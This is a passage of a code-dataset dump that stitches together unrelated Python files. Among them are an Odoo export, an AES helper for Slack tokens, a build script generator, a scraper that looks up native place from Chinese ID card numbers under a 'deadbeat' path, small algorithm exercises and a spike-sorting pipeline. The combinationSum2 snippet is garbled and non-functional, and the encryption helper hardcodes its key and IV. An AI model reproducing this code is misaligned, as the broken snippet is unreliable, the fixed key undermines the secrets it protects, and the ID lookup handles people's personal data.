TRF_PIVA_ESTERO=\"\",\n TRF_COFI_ESTERO=\"\",\n TRF_SESSO=\"\",\n TRF_DTNAS=\"\",\n TRF_COMNA=\"\",\n TRF_PRVNA=\"\",\n TRF_PREF=\"\",\n TRF_NTELE_NUM=\"\",\n TRF_FAX_PREF=\"\",\n TRF_FAX_NUM=\"\",\n TRF_CFCONTO=\"\",\n TRF_CFCODPAG=\"\",\n TRF_CFBANCA=\"\",\n TRF_CFAGENZIA=\"\",\n TRF_CFINTERM=\"\",\n TRF_CAUSALE=\"001\",\n TRF_CAU_DES=\"Causale\",\n TRF_CAU_AGG=\"di prova\",\n TRF_CAU_AGG_1=\"\",\n TRF_CAU_AGG_2=\"\",\n TRF_DATA_REGISTRAZIONE=\"15012016\",\n TRF_DATA_DOC=\"15012016\",\n TRF_NUM_DOC_FOR=\"\",\n TRF_NDOC=\"12\",\n TRF_SERIE=\"\",\n TRF_EC_PARTITA=\"\",\n TRF_EC_PARTITA_ANNO=\"\",\n TRF_EC_COD_VAL=\"\",\n TRF_EC_CAMBIO=\"\",\n TRF_EC_DATA_CAMBIO=\"\",\n TRF_EC_TOT_DOC_VAL=\"\",\n TRF_EC_TOT_IVA_VAL=\"\",\n TRF_PLAFOND=\"\",\n TRF_IMPONIB=\"100000\",\n TRF_ALIQ=\"22\",\n TRF_ALIQ_AGRICOLA=\"\",\n TRF_IVA11=\"\",\n TRF_IMPOSTA=\"22000\",\n TRF_IMPONIB2=\"\",\n TRF_ALIQ2=\"\",\n TRF_ALIQ_AGRICOLA2=\"\",\n TRF_IVA112=\"\",\n TRF_IMPOSTA2=\"\",\n TRF_IMPONIB3=\"\",\n TRF_ALIQ3=\"\",\n TRF_ALIQ_AGRICOLA3=\"\",\n TRF_IVA113=\"\",\n TRF_IMPOSTA3=\"\",\n TRF_IMPONIB4=\"\",\n TRF_ALIQ24=\"\",\n TRF_ALIQ_AGRICOLA4=\"\",\n TRF_IVA114=\"\",\n TRF_IMPOSTA4=\"\",\n TRF_IMPONIB5=\"\",\n TRF_ALIQ5=\"\",\n TRF_ALIQ_AGRICOLA5=\"\",\n TRF_IVA115=\"\",\n TRF_IMPOSTA5=\"\",\n TRF_IMPONIB6=\"\",\n TRF_ALIQ6=\"\",\n TRF_ALIQ_AGRICOLA6=\"\",\n TRF_IVA116=\"\",\n TRF_IMPOSTA6=\"\",\n TRF_IMPONIB7=\"\",\n TRF_ALIQ7=\"\",\n TRF_ALIQ_AGRICOLA7=\"\",\n TRF_IVA117=\"\",\n TRF_IMPOSTA7=\"\",\n TRF_IMPONIB8=\"\",\n TRF_ALIQ8=\"\",\n TRF_ALIQ_AGRICOLA8=\"\",\n TRF_IVA118=\"\",\n TRF_IMPOSTA8=\"\",\n TRF_TOT_FATT=\"122000\",\n TRF_CONTO_RIC=\"5805507\",\n TRF_IMP_RIC=\"100000\",\n TRF_CAU_PAGAM=\"\",\n TRF_CAU_DES_PAGAM=\"\",\n TRF_CAU_AGG_1_PAGAM=\"\",\n TRF_CAU_AGG_2_PAGAM=\"\",\n TRF_CONTO=\"\",\n TRF_DA=\"\",\n TRF_IMPORTO=\"\",\n TRF_CAU_AGGIUNT=\"\",\n TRF_EC_PARTITA_PAG=\"\",\n TRF_EC_PARTITA_ANNO_PAG=\"\",\n TRF_EC_IMP_VAL=\"\",\n TRF_RIFER_TAB=\"\",\n TRF_IND_RIGA=\"\",\n TRF_DT_INI=\"\",\n TRF_DT_FIN=\"\",\n TRF_DOC6=\"\",\n TRF_AN_OMONIMI=\"\",\n TRF_AN_TIPO_SOGG=\"\",\n TRF_EC_PARTITA_SEZ_PAG=\"\",\n TRF_NUM_DOC_PAG_PROF=\"\",\n TRF_DATA_DOC_PAG_PROF=\"\",\n TRF_RIT_ACC=\"\",\n TRF_RIT_PREV=\"\",\n TRF_RIT_1=\"\",\n TRF_RIT_2=\"\",\n TRF_RIT_3=\"\",\n TRF_RIT_4=\"\",\n TRF_UNITA_RICAVI=\"\",\n TRF_UNITA_PAGAM=\"\",\n TRF_FAX_PREF_1=\"\",\n TRF_FAX_NUM_1=\"\",\n TRF_SOLO_CLIFOR=\"\",\n TRF_80_SEGUENTE=\"\",\n TRF_CONTO_RIT_ACC=\"\",\n TRF_CONTO_RIT_PREV=\"\",\n TRF_CONTO_RIT_1=\"\",\n TRF_CONTO_RIT_2=\"\",\n TRF_CONTO_RIT_3=\"\",\n TRF_CONTO_RIT_4=\"\",\n TRF_DIFFERIMENTO_IVA=\"\",\n TRF_STORICO=\"\",\n TRF_STORICO_DATA=\"\",\n TRF_CAUS_ORI=\"\",\n TRF_PREV_TIPOMOV=\"\",\n TRF_PREV_RATRIS=\"\",\n TRF_PREV_DTCOMP_INI=\"\",\n TRF_PREV_DTCOMP_FIN=\"\",\n TRF_PREV_FLAG_CONT=\"\",\n TRF_RIFERIMENTO=\"\",\n TRF_CAUS_PREST_ANA=\"\",\n TRF_EC_TIPO_PAGA=\"\",\n TRF_CONTO_IVA_VEN_ACQ=\"\",\n TRF_PIVA_VECCHIA=\"\",\n TRF_PIVA_ESTERO_VECCHIA=\"\",\n TRF_RISERVATO=\"\",\n TRF_DATA_IVA_AGVIAGGI=\"\",\n TRF_DATI_AGG_ANA_REC4=\"\",\n TRF_RIF_IVA_NOTE_CRED=\"\",\n TRF_RIF_IVA_ANNO_PREC=\"\",\n TRF_NATURA_GIURIDICA=\"\",\n TRF_STAMPA_ELENCO=\"\",\n TRF_PERC_FORF=\"\",\n TRF_SOLO_MOV_IVA=\"\",\n TRF_COFI_VECCHIO=\"\",\n TRF_USA_PIVA_VECCHIA=\"\",\n TRF_USA_PIVA_EST_VECCHIA=\"\",\n TRF_USA_COFI_VECCHIO=\"\",\n TRF_ESIGIBILITA_IVA=\"\",\n TRF_TIPO_MOV_RISCONTI=\"\",\n TRF_AGGIORNA_EC=\"\",\n TRF_BLACKLIST_ANAG=\"\",\n TRF_BLACKLIST_IVA=\"\",\n TRF_BLACKLIST_IVA_ANA=\"\",\n TRF_CONTEA_ESTERO=\"\",\n TRF_ART21_ANAG=\"\",\n TRF_ART21_IVA=\"\",\n TRF_RIF_FATTURA=\"\",\n TRF_RISERVATO_B=\"\"\n )\n path = os.path.expanduser('./etc/odoo/addons/odoo_imppn/IMPPN.txt')\n fileIMPPN = open(path, 'r+')\n fileIMPPN.write(result_string.rstrip('\\r\\n'))\n fileIMPPN.close()\n","sub_path":"models/odoo_imppn.py","file_name":"odoo_imppn.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206139210","text":"from __future__ import print_function, unicode_literals\nimport base64\nimport sys\nimport pyaes.aes\n\nif sys.version_info < (3, 0):\n prompt = raw_input\nelse:\n prompt = input\n\nkey = 'unfoldingWord.org_door43.org_ufw'\niv = 'unfoldingWord_43'\n\n\ndef encrypt_slack_token(token):\n global key, iv\n\n aes = pyaes.AESModeOfOperationOFB(key, iv=iv)\n encrypted_text = aes.encrypt(token)\n return base64.b64encode(encrypted_text)\n\n\ndef decrypt_slack_token(encrypted_token):\n global key, iv\n\n aes = pyaes.AESModeOfOperationOFB(key, iv=iv)\n return aes.decrypt(base64.b64decode(encrypted_token))\n\n\nif __name__ == '__main__':\n\n # initialization\n plain_text = prompt('Enter the string to encrypt: ')\n\n # encrypt the string and display\n b64 = encrypt_slack_token(plain_text)\n print()\n print('Encrypted text: {0}'.format(b64))\n\n # test decrypting and display the result\n plain_text = decrypt_slack_token(b64)\n print()\n print('Decrypted text: {0}'.format(plain_text))\n","sub_path":"functions/invite/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"472714236","text":"import os\r\nimport sys\r\n\r\nfrom utils import *\r\nfrom utils import _make_path_relative\r\nimport osconfig\r\n\r\nmakefile = '''phony := all\r\nall:\r\n\r\ninclude config.mk\r\n\r\nifneq ($(MAKE_LIB),1)\r\nTARGET := oneos.elf\r\ninclude src.mk\r\nendif\r\n\r\n$(if $(strip $(OS_ROOT)),,$(error OS_ROOT not defined))\r\n\r\ninclude $(OS_ROOT)/scripts/oneos.mk\r\n'''\r\n\r\ndef TargetMakefile(env):\r\n project = ProjectInfo(env)\r\n\r\n BSP_ROOT = os.path.abspath(env['BSP_ROOT'])\r\n OS_ROOT = os.path.abspath(env['OS_ROOT'])\r\n\r\n match_bsp = False\r\n if BSP_ROOT.startswith(OS_ROOT): \r\n match_bsp = True\r\n\r\n make = open('config.mk', 'w')\r\n\r\n make.write('BSP_ROOT ?= %s\\n' % BSP_ROOT.replace('\\\\', '/'))\r\n make.write('OS_ROOT ?= %s\\n' % OS_ROOT.replace('\\\\', '/'))\r\n make.write('\\n')\r\n\r\n cross = os.path.abspath(osconfig.COMPILER_PATH)\r\n cross = os.path.join(cross, osconfig.PREFIX)\r\n make.write('CROSS_COMPILE ?=%s' % cross.replace('\\\\', '\\\\\\\\'))\r\n make.write('\\n')\r\n make.write('\\n')\r\n\r\n make.write('CFLAGS :=%s' % (osconfig.CFLAGS))\r\n make.write('\\n')\r\n make.write('AFLAGS :=%s' % (osconfig.AFLAGS))\r\n make.write('\\n')\r\n make.write('LFLAGS :=%s' % (osconfig.LFLAGS))\r\n make.write('\\n')\r\n if 'CXXFLAGS' in dir(osconfig):\r\n make.write('CXXFLAGS :=%s' % (osconfig.CXXFLAGS))\r\n make.write('\\n')\r\n\r\n make.write('\\n')\r\n\r\n Files = project['FILES']\r\n Headers = project['HEADERS']\r\n CPPDEFINES = project['CPPDEFINES']\r\n\r\n paths = [os.path.normpath(i) for i in project['CPPPATH']]\r\n CPPPATH = []\r\n for path in paths:\r\n fn = os.path.normpath(path)\r\n if match_bsp:\r\n if fn.startswith(BSP_ROOT):\r\n fn = '$(BSP_ROOT)' + fn.replace(BSP_ROOT, '')\r\n elif fn.startswith(OS_ROOT):\r\n fn = '$(OS_ROOT)' + fn.replace(OS_ROOT, '')\r\n else:\r\n if fn.startswith(OS_ROOT):\r\n fn = '$(OS_ROOT)' + fn.replace(OS_ROOT, '')\r\n elif fn.startswith(BSP_ROOT):\r\n fn = '$(BSP_ROOT)' + fn.replace(BSP_ROOT, '')\r\n\r\n CPPPATH.append(fn)\r\n\r\n path = ''\r\n paths = CPPPATH\r\n for item in paths:\r\n path += '\\t-I%s \\\\\\n' % item\r\n\r\n make.write('CPPPATHS :=')\r\n if path[0] == '\\t': path = path[1:]\r\n length = len(path)\r\n if path[length - 2] == '\\\\': path = path[:length - 2]\r\n make.write(path)\r\n make.write('\\n')\r\n make.write('\\n')\r\n\r\n defines = ''\r\n for item in project['CPPDEFINES']:\r\n defines += ' -D%s' % item\r\n make.write('DEFINES :=')\r\n make.write(defines)\r\n make.write('\\n')\r\n\r\n files = Files\r\n Files = []\r\n for file in files:\r\n fn = os.path.normpath(file)\r\n if match_bsp:\r\n if fn.startswith(BSP_ROOT):\r\n fn = '$(BSP_ROOT)' + fn.replace(BSP_ROOT, '')\r\n elif fn.startswith(OS_ROOT):\r\n fn = '$(OS_ROOT)' + fn.replace(OS_ROOT, '')\r\n else:\r\n if fn.startswith(OS_ROOT):\r\n fn = '$(OS_ROOT)' + fn.replace(OS_ROOT, '')\r\n elif fn.startswith(BSP_ROOT):\r\n fn = '$(BSP_ROOT)' + fn.replace(BSP_ROOT, '')\r\n\r\n Files.append(fn)\r\n # print(fn)\r\n\r\n src = open('src.mk', 'w')\r\n files = Files\r\n src.write('SRC_FILES :=\\n')\r\n for item in files:\r\n src.write('SRC_FILES +=%s\\n' % item.replace('\\\\', '/'))\r\n\r\n make = open('Makefile', 'w')\r\n make.write(makefile)\r\n make.close()\r\n\r\n return\r\n","sub_path":"scripts/makefile.py","file_name":"makefile.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129788944","text":"# coding: utf-8\nfrom scrapy.selector import Selector\n\nfrom app.spider.base import Spider\nfrom app.utils.id_card import IdCardParser\n\n\nclass IP138Spider(Spider):\n query_url = \"http://qq.ip138.com/idsearch/index.asp\"\n\n use_new_native_place = False # 有些籍贯地址有新老两个名称,是否返回新的名称\n\n async def query(self, idCard, **kwargs):\n parser = IdCardParser(idCard)\n if parser.native_place:\n return {\"nativePlace\": parser.native_place}\n\n async with self.aio_session:\n payload = {\n \"action\": \"idcard\",\n \"userid\": f\"{idCard[:6]}197001010000\",\n \"B1\": \"查+询\",\n }\n\n text = await self.fetch(url=self.query_url, params=payload, return_type=str)\n\n selector = Selector(text=text)\n native_place_list = selector.css('.tdc2::text').extract()[2:]\n\n if native_place_list:\n native_place = native_place_list[-1] if self.use_new_native_place else native_place_list[0]\n return {\"nativePlace\": native_place.strip()}\n\n return {\"nativePlace\": \"\"}\n","sub_path":"app/spider/deadbeat/ip138/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"262113477","text":"class solution:\n def combinationSum2(self,candidates,target):\n ssum= sum(candidates)\n if(ssum=nums[i]):\n dp[j].append(j-nums[i])\n j-=1\n return dp[-1]\n\nnums=[10,1,2,7,6,1,5]\ntarget = 8\n\nprint(solution().combinationSum2(nums,target))","sub_path":"python/combinationSum2.py","file_name":"combinationSum2.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"632233474","text":"##=================================================\n# @Author : NgTuong\n# File : utils.py\n# Time : 24/09/2019\n# Description : Load dataset using hdf5 file\n##==================================================\n\nimport numpy as np\nimport h5py\n\ndef load_dataset():\n dataset = h5py.File(\"cat_and_dog.hdf5\", 'r')\n\n train_set = np.array(dataset[\"train_img\"][:])\n train_labels = np.array(dataset[\"train_labels\"][:])\n train_labels = train_labels.reshape((1, train_labels.shape[0]))\n\n test_set = np.array(dataset[\"test_img\"][:])\n test_labels = np.array(dataset[\"test_labels\"][:])\n test_labels = test_labels.reshape((1, test_labels.shape[0]))\n\n return train_set, train_labels[0], test_set, test_labels[0]","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"49212156","text":"\"\"\"IRC Stuff\"\"\"\nimport core\nPLUGINVERSION = 2\n# Always name this variable as `plugin`\n# If you dont, module loader will fail to load the plugin!\nplugin = core.Plugin()\n@plugin.command(command=\"/me\",\n description=\"/me from IRC\",\n inline_supported=True,\n hidden=False)\ndef me(bot, update, user, args):\n args = \" \".join(update.message.text.split(\" \")[1:])\n return core.message(text=\"* %s %s\" % (user.username, args))\n","sub_path":"me.py","file_name":"me.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"198981303","text":"# def updateMatrix(self, matrix):\n\n# matrix = [[0,0,0], [0,1,0], [0,0,0]]\nmatrix = [[0,0,0], [0,1,0], [1,1,1]]\n\nn, m = len(matrix),len(matrix[0])\ndp = [[float('Inf')] * m for _ in range(n)]\n\n# 왼쪽 위부터 돌면서 minimum값 찾기\nfor i in range(n):\n for j in range(m):\n if matrix[i][j] == 0:\n dp[i][j] = 0\n else:\n if i > 0:\n dp[i][j] = min(dp[i][j], dp[i-1][j]+1)\n if j > 0:\n dp[i][j] = min(dp[i][j], dp[i][j-1]+1)\n\n# 오른쪽 아래부터 돌면서 minimum값 찾기\n# 처음에 이것만 했더니 [[0, 0, 0], [0, 1, 0], [inf, inf, inf]]이런 결과 나옴\nfor i in range(n-1, -1, -1):\n for j in range(m-1, -1, -1):\n if matrix[i][j] == 0:\n dp[i][j] = 0\n else:\n if i < n-1:\n dp[i][j] = min(dp[i][j], dp[i+1][j]+1)\n if j < m-1:\n dp[i][j] = min(dp[i][j], dp[i][j+1]+1)\n\nprint(dp)","sub_path":"1월 2주차/[LEETCODE] 01 Matrix.py","file_name":"[LEETCODE] 01 Matrix.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"82741261","text":"from odoo import models, fields, api\nfrom odoo.exceptions import ValidationError, UserError\n\n\nclass Pagar_letras_wizard(models.TransientModel):\n _name = 'pagar_letras_wizard'\n _description = \"Pagar letras\"\n\n\n def _get_letras(self):\n if self.env.context and self.env.context.get('active_ids'):\n return self.env.context.get('active_ids')\n return []\n\n\n letra_ids = fields.Many2many('letra_cambio.letra', default=_get_letras, string='Letras')\n\n currency_id = fields.Many2one('res.currency', string='Moneda')\n gastos = fields.Monetary(string='Gastos por cobranza libre')\n\n @api.multi\n def pagar_letras(self):\n active_ids = self.env.context.get('active_ids', []) or []\n records = self.env['letra_cambio.letra'].browse(active_ids)\n\n self.env['letra_cambio.letra'].cambiar_estado_all_gastos(records, \"PAG\",self.gastos)\n","sub_path":"addons/letra_cambio/wizard/pagar_letras_wizard.py","file_name":"pagar_letras_wizard.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"384936027","text":"import os\nimport shutil\nimport subprocess\nimport numpy as np\n\nfrom helpers import SpikeGLX_utils\nfrom helpers import log_from_json\nfrom create_input_json import createInputJson\n\n# script to run CatGT, KS2, postprocessing and TPrime on data collected using\n# SpikeGLX. The construction of the paths assumes data was saved with\n# \"Folder per probe\" selected (probes stored in separate folders) AND\n# that CatGT is run with the -out_prb_fld option\n\n# -----------\n# Input data\n# -----------\n# Name for log file for this pipeline run. Log file will be saved in the\n# output destination directory catGT_dest\nlogName = 'dl56_20181126_log.csv'\n\n# Raw data directory = npx_directory, all runs to be processed are in\n# subfolders of this folder\nnpx_directory = r'D:\\ecephys_fork\\test_data\\3A_DL'\n\n# run_specs = name, gate, trigger and probes to process\n# Each run_spec is a list:\n# (string) animal name = undecorated run name , e.g. 'dl56',\n# (string) date of recording, as yyyymmdd, eg '20181126'\n# (string) gate index, as a string (e.g. '0')\n# (string) triggers to process/concatenate, as a string e.g. '0,400', '0,0', \n# can replace first limit with 'start', last with 'end'; 'start,end'\n# will concatenate all trials in the probe folder\n# (list of strings) computer/ probe labels to process, as a list, e.g. ['ww2','ww4']\n# (list of ints) SY channel for each run -- if no SY channel, or not extracting that data, enter None\n#\n# The assumed file structure for input is:\n# /probe(computer) label/date/animal name/*.bin files\n# Note that the both the folder name and run name = animal name\n# Does not use SpikeGLX generated run folders\n\nrun_specs = [\n\t\t\t\t\t['dl56', '20181126', '0', 'start,end', ['ww2','ww4'], [384,384]]\n]\n\n\n\n# ------------------\n# Output destination\n# ------------------\n# Set to an existing directory; all output will be written here, in\n# subfolders named animal name_date\ncatGT_dest_parent = r'D:\\ecephys_fork\\test_data\\3A_DL\\DL56'\n\n# ------------\n# CatGT params\n# ------------\nrun_CatGT = True # set to False to sort/process previously processed data.\n# catGT streams to process, e.g. just '-ap' for ap band only, '-ap -ni' for\n# ap plus ni aux inputs\ncatGT_stream_string = '-prb_3A -ap -no_run_fld -t_miss_ok'\n\n# CatGT command string includes all instructions for catGT operations\n# see CatGT readme for details\n# 3A specific details:\n# -no automatically generated run folders. Assume user has grouped data from the probes\n# -into one folder, named in the run_spec\n# -no probe folders -- each call to catGT processes one probes data.\n# - the extraction parameters (bit, length in msec) are assumed to be the same for all probes\n# - the correct channel for the extraction is specfied in run_spec[4]\ncatGT_cmd_string = '-aphipass=300 -aplopass=9000 -gbldmx -gfix=0,0.10,0.02'\n\n# for each desired estraction from the SY channel, specify:\n# bit, span in msec, and tolerance in ms, or -1 to use default\n# tolerance of 20% of span\n# the extraction strings for catGT will be built for each probe\nsy_ex_param_list = list()\nsy_ex_param_list.append([0, 0, -1])\nsy_ex_param_list.append([1, 50, -1])\nsy_ex_param_list.append([1, 10, -1])\nsy_ex_param_list.append([1, 1200, 0.2])\n\n# ----------------------\n# psth_events parameters\n# ----------------------\n# extract param string for psth events -- copy the CatGT params used to extract\n# events that should be exported with the phy output for PSTH plots\n# With 3A, it is assumed that the same extraction parameters will be used for\n# all probes, and the index is specfied here\n# If not using, remove psth_events from the list of modules\nevent_ex_param_index = 1\n\n# -----------------\n# TPrime parameters\n# -----------------\nrunTPrime = True # set to False if not using TPrime\nsync_period = 12.0 # true for SYNC wave, in 3A using the trial TTL signal\nsync_param = [0, 0, -1] # SYNC bit and msec duration of SYNC signal\n\n# ---------------\n# Modules List\n# ---------------\n# List of modules to run per probe; \n# CatGT is handled separated; TPrime is called once for each run.\nmodules = [\n\t\t\t'kilosort_helper',\n 'kilosort_postprocessing',\n 'noise_templates',\n #'psth_events',\n 'mean_waveforms',\n 'quality_metrics'\n\t\t\t]\n\njson_directory = r'D:\\ecephys_fork\\json_files'\n\n\n# delete the existing CatGT.log\ntry:\n os.remove('CatGT.log')\nexcept OSError:\n pass\n\n# delete existing Tprime.log\ntry:\n os.remove('Tprime.log')\nexcept OSError:\n pass\n\n# delete existing C_waves.log\ntry:\n os.remove('C_Waves.log')\nexcept OSError:\n pass\n\n# delete any existing log with the current name\nlogFullPath = os.path.join(catGT_dest_parent, logName)\ntry:\n os.remove(logFullPath)\nexcept OSError:\n pass\n\n# create the log file, write header\nlog_from_json.writeHeader(logFullPath)\n\n\nfor spec in run_specs:\n\n session_id = spec[0] + '_' + spec[1] + '_g' + spec[2]\n\n # if the directory animal name_date does not yet exist, create it\n catGT_dest = os.path.join(catGT_dest_parent, session_id)\n if not os.path.exists(catGT_dest):\n os.mkdir(catGT_dest)\n\n # probe list == probe label list for 3A\n prb_list = spec[4]\n\n # create space for gfix_edits read from catGT log\n gfix_edits = np.zeros(len(prb_list), dtype='float64')\n\n # inputs for tPrime\n fromStream_list = list()\n\n for i, prb in enumerate(prb_list):\n\n # Path to folder containing bindaries.\n # The assumed file structure for input is:\n # /probe(computer) label/animal name/date/*.bin files\n runFolder = os.path.join(npx_directory, prb, spec[0], spec[1])\n # name of run in input data; note that this run name is not unique\n # but repeated for different dates\n runName = spec[0]\n\n # build parameter strings for catGT edge extractions for this probe\n currSY = spec[5][i]\n \n # build the \"final\" name for the catGT output folder\n # CatGT output will intially go into a folder named for the input;\n # after running rename to this name\n final_catGT_name = 'catgt_' + spec[0] + '_' + spec[1] + prb + '_g' + spec[2]\n final_catGT_dest = os.path.join( catGT_dest, final_catGT_name)\n print('final_catGT_dest: ', final_catGT_dest)\n\n if currSY is not None:\n ex_param_str = ''\n for exparam in sy_ex_param_list:\n if exparam[2] == -1:\n # use default tolerance\n currStr = ('SY=0,{0:d},{1:d},{2:d}'.format(currSY, exparam[0], exparam[1]))\n else:\n currStr = ('SY=0,{0:d},{1:d},{2:d},{3:.1f}'.format(currSY, exparam[0], exparam[1], exparam[2]))\n ex_param_str = ex_param_str + ' -' + currStr\n if exparam == sync_param:\n # for Tprime, build path to extracted edges \n currNameStr = ('SY_{0:d}_{1:d}_{2:d}'.format(currSY, exparam[0], exparam[1]))\n sy_name = runName + '_g' + spec[2] + '_tcat.imec.' + currNameStr + '.txt'\n sy_path = os.path.join(catGT_dest, final_catGT_dest, sy_name)\n if i == 0:\n # this will be the toStream\n toStream = sy_path\n print('toStream path: ', toStream)\n else:\n #append to list of fromStream paths\n fromStream_list.append(sy_path)\n print('fromStream path: ', fromStream_list[len(fromStream_list)-1])\n \n probe_catGT_cmd_string = catGT_cmd_string + ' ' + ex_param_str \n \n # build parameter string for PSTH events \n if 'psth_events' in modules:\n exparam = sy_ex_param_list[event_ex_param_index]\n event_ex_param_str = ('SY=0,{0:d},{1:d},{2:d}'.format(currSY, exparam[0], exparam[1]))\n else:\n event_ex_param_str = 'SY=0,384,1,50' # just default filler\n \n \n\n # Run CatGT\n input_json = os.path.join(json_directory, session_id + '-input.json')\n output_json = os.path.join(json_directory, session_id + '-output.json')\n print('Creating json file for preprocessing')\n print(runFolder)\n # In this case, the run folder and probe folder are the same;\n # parse trigger string using this folder to interpret 'start' and 'end'\n first_trig, last_trig = SpikeGLX_utils.ParseTrigStr(spec[3], runFolder) \n trigger_str = repr(first_trig) + ',' + repr(last_trig)\n \n info = createInputJson(input_json, npx_directory=runFolder, \n \t continuous_file = None,\n spikeGLX_data = 'True',\n \t\t\t\t\t\t\t\t\t kilosort_output_directory=catGT_dest,\n catGT_run_name = runName,\n gate_string = spec[2],\n trigger_string = trigger_str,\n probe_string = '',\n catGT_stream_string = catGT_stream_string,\n catGT_cmd_string = probe_catGT_cmd_string,\n extracted_data_directory = catGT_dest\n )\n \n \n \n \n if run_CatGT:\n \n command = \"python -W ignore -m ecephys_spike_sorting.modules.\" + 'catGT_helper' + \" --input_json \" + input_json \\\n \t\t + \" --output_json \" + output_json\n subprocess.check_call(command.split(' ')) \n \n # parse the CatGT log and write results to command line\n # for 3A, there's only one probe, called 0\n gfix_edits = SpikeGLX_utils.ParseCatGTLog( os.getcwd(), runName, spec[2], ['0'] )\n edit_string = '{:.3f}'.format(gfix_edits[0])\n print(runName + ' gfix edits/sec: ' + edit_string)\n \n # rename output folder a name that includes the date and probe name\n \n orig_catGT_name = 'catgt_' + runName + '_g' + spec[2]\n orig_catGT_out = os.path.join(catGT_dest, orig_catGT_name)\n \n os.rename(orig_catGT_out, final_catGT_dest)\n \n\n \n # finsihed preprocessing.\n\n #create json files specific to this probe\n input_json = os.path.join(json_directory, spec[0] + prb + '-input.json')\n \n \n # location of the binary after renaming \n data_directory = final_catGT_dest\n # fileName, built from the input run name\n fileName = runName + '_g' + spec[2] + '_tcat.imec.ap.bin'\n continuous_file = os.path.join(data_directory, fileName)\n \n outputName = 'imec_' + prb + '_ks2'\n\n # kilosort_postprocessing and noise_templates moduules alter the files\n # that are input to phy. If using these modules, keep a copy of the\n # original phy output\n if ('kilosort_postprocessing' in modules) or('noise_templates' in modules):\n ks_make_copy = True\n else:\n ks_make_copy = False\n\n kilosort_output_dir = os.path.join(data_directory, outputName)\n\n print(data_directory)\n print(continuous_file)\n\n info = createInputJson(input_json, npx_directory=npx_directory, \n\t continuous_file = continuous_file,\n spikeGLX_data = True,\n\t\t\t\t\t\t\t\t\t kilosort_output_directory=kilosort_output_dir,\n ks_make_copy = ks_make_copy,\n noise_template_use_rf = False,\n catGT_run_name = session_id,\n gate_string = spec[1],\n trigger_string = trigger_str,\n probe_string = '',\n catGT_stream_string = catGT_stream_string,\n catGT_cmd_string = probe_catGT_cmd_string,\n catGT_gfix_edits = gfix_edits[0],\n extracted_data_directory = catGT_dest,\n event_ex_param_str = event_ex_param_str\n ) \n\n # copy json file to data directory as record of the input parameters (and gfix edit rates) \n shutil.copy(input_json, os.path.join(data_directory, session_id + '-input.json'))\n \n for module in modules:\n output_json = os.path.join(json_directory, session_id + '-' + module + '-output.json') \n command = \"python -W ignore -m ecephys_spike_sorting.modules.\" + module + \" --input_json \" + input_json \\\n\t\t + \" --output_json \" + output_json\n subprocess.check_call(command.split(' '))\n \n log_from_json.addEntry(modules, json_directory, session_id, logFullPath)\n \n if runTPrime:\n # after loop over probes, run TPrime to create files of \n # event times -- edges detected in auxialliary files and spike times \n # from each probe -- all aligned to a reference stream.\n \n # create json files for calling TPrime\n session_id = spec[0] + '_TPrime'\n input_json = os.path.join(json_directory, session_id + '-input.json')\n output_json = os.path.join(json_directory, session_id + '-output.json')\n \n info = createInputJson(input_json, npx_directory=npx_directory, \n \t continuous_file = continuous_file,\n spikeGLX_data = True,\n \t\t\t\t\t\t\t\t\t kilosort_output_directory=kilosort_output_dir,\n ks_make_copy = ks_make_copy,\n noise_template_use_rf = False,\n catGT_run_name = spec[0],\n gate_string = spec[1],\n trigger_string = trigger_str,\n probe_string = '',\n catGT_stream_string = catGT_stream_string,\n catGT_cmd_string = catGT_cmd_string,\n catGT_gfix_edits = gfix_edits[0],\n extracted_data_directory = catGT_dest,\n event_ex_param_str = event_ex_param_str,\n sync_period = sync_period,\n toStream_sync_params = '',\n niStream_sync_params = '',\n toStream_path_3A = toStream,\n fromStream_list_3A = fromStream_list\n ) \n \n command = \"python -W ignore -m ecephys_spike_sorting.modules.\" + 'tPrime_helper' + \" --input_json \" + input_json \\\n \t\t + \" --output_json \" + output_json\n subprocess.check_call(command.split(' ')) \n ","sub_path":"ecephys_spike_sorting/scripts/spikeGLX_3A_DL.py","file_name":"spikeGLX_3A_DL.py","file_ext":"py","file_size_in_byte":15382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"74624881","text":"# -*- coding: utf-8 -*-\n\n\"\"\"This script compares what's in OBO, OLS, and MIRIAM.\"\"\"\n\nimport json\nimport os\n\nimport matplotlib.pyplot as plt\nfrom matplotlib_venn import venn3\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef _get_json(name):\n with open(os.path.join(HERE, name)) as file:\n return json.load(file)\n\n\ndef main():\n \"\"\"Compare the registries.\"\"\"\n miriam = _get_json('miriam.json')\n miriam_entries = {\n entry['prefix'].lower()\n for entry in miriam\n }\n\n ols = _get_json('ols.json')\n ols_entries = {\n entry['ontologyId'].lower()\n for entry in ols\n }\n\n obofoundry = _get_json('obofoundry.json')\n obofoundry_entries = {\n entry['id'].lower()\n for entry in obofoundry\n }\n\n venn3(\n subsets=[miriam_entries, ols_entries, obofoundry_entries],\n set_labels=('MIRIAM', 'OLS', 'OBOFoundry'),\n )\n plt.tight_layout()\n plt.savefig('compare.svg')\n\n # nothing interesting unique to OLS\n # print(*sorted(ols_entries - miriam_entries - obofoundry_entries), sep='\\n')\n # nothing interesting unique in 